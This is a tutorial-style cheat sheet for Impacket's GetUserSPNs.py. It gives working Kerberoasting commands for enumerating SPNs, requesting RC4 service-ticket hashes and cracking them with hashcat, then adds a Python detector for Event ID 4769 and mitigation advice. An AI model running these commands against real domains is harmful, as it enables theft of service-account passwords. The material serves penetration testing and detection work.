Impacket-GetUserSPNs
GetUserSPNs.py is a script from the Impacket toolkit used to enumerate Service Principal Names (SPNs) in an Active Directory environment. It is commonly used in Kerberoasting attacks to request and extract Kerberos service ticket (TGS) hashes for offline cracking.
Installation
If Impacket is not already installed:
git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m pip install .
Basic Usage Without Authentication
Enumerate SPNs anonymously (if allowed)
python3 GetUserSPNs.py infosecwarrior.local/ -dc-ip <IP>
Authenticated SPN Enumeration
Authenticate as a domain user to enumerate SPNs (the RC4 hashes themselves are obtained with -request).
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP>
Use a Custom User List
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -usersfile username.txt
Request Service Tickets
Add the -request flag to request TGS tickets and obtain crackable hashes.
python3 GetUserSPNs.py infosecwarrior.local/ -dc-ip <IP> -request
With credentials:
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -request
Use with User File + Request Hashes
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -usersfile username.txt -request
Output hashes to File
python3 GetUserSPNs.py infosecwarrior.local/administrator:Password123 -dc-ip <IP> -request -outputfile kerberoasting-hash.txt
Crack Hashes with hashcat
Use hash mode 13100 for Kerberos 5 TGS-REP etype 23 hashes:
hashcat -a 0 -m 13100 kerberoasting-hash.txt /opt/rockyou.txt
Notes
Only accounts with SPNs and RC4_HMAC (etype 23) can be roasted.
TGS hashes are crackable offline and may reveal the plaintext passwords of service accounts.
SPNs typically follow formats like:
HTTP/servername.domain.local
MSSQLSvc/servername:1433
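From the defender's side, the ticket requests above show up on the domain controller as Kerberos service ticket events (Event ID 4769) whose encryption type is 0x17 (RC4, etype 23) for user accounts that hold an SPN. The following is an added example, not code from the original page or from Impacket: it flags a single requester pulling RC4 service tickets for several distinct SPN accounts, on a constructed, flattened "Key=Value;Key=Value" rendering of 4769 events (assumed format, not a real log export).

```python
# Constructed sample 4769 events (not real logs), flattened to one event per line.
SAMPLE_4769 = """\
TargetUserName=alice@INFOSECWARRIOR.LOCAL;ServiceName=krbtgt;TicketEncryptionType=0x12;IpAddress=10.0.0.5
TargetUserName=alice@INFOSECWARRIOR.LOCAL;ServiceName=svc_sql;TicketEncryptionType=0x17;IpAddress=10.0.0.5
TargetUserName=alice@INFOSECWARRIOR.LOCAL;ServiceName=svc_http;TicketEncryptionType=0x17;IpAddress=10.0.0.5
TargetUserName=alice@INFOSECWARRIOR.LOCAL;ServiceName=svc_backup;TicketEncryptionType=0x17;IpAddress=10.0.0.5
TargetUserName=bob@INFOSECWARRIOR.LOCAL;ServiceName=WS01$;TicketEncryptionType=0x17;IpAddress=10.0.0.9
TargetUserName=bob@INFOSECWARRIOR.LOCAL;ServiceName=svc_sql;TicketEncryptionType=0x12;IpAddress=10.0.0.9
"""

RC4_HMAC = 0x17  # etype 23: the ticket type hashcat mode 13100 cracks


def parse_event(line):
    """Split one flattened event line into a dict of its fields."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if kv)


def is_roastable_request(ev):
    """True if the event is an RC4 service ticket for a user account SPN."""
    svc = ev["ServiceName"]
    # krbtgt is a TGT request; accounts ending in '$' are computer accounts
    # with long random passwords, so neither is a Kerberoasting target.
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return False
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def find_kerberoast_candidates(log_text, threshold=3):
    """Return {(user, ip): [services]} for requesters that obtained RC4
    tickets for at least `threshold` distinct SPN accounts."""
    seen = {}
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_roastable_request(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            seen.setdefault(key, set()).add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"possible Kerberoasting: {user} from {ip} requested RC4 tickets for {services}")
```

Enforcing AES-only (etype 17/18) on service accounts and using gMSAs removes the RC4 tickets this check keys on; the threshold is a tuning knob, since a legitimate user rarely touches many SPN accounts in quick succession.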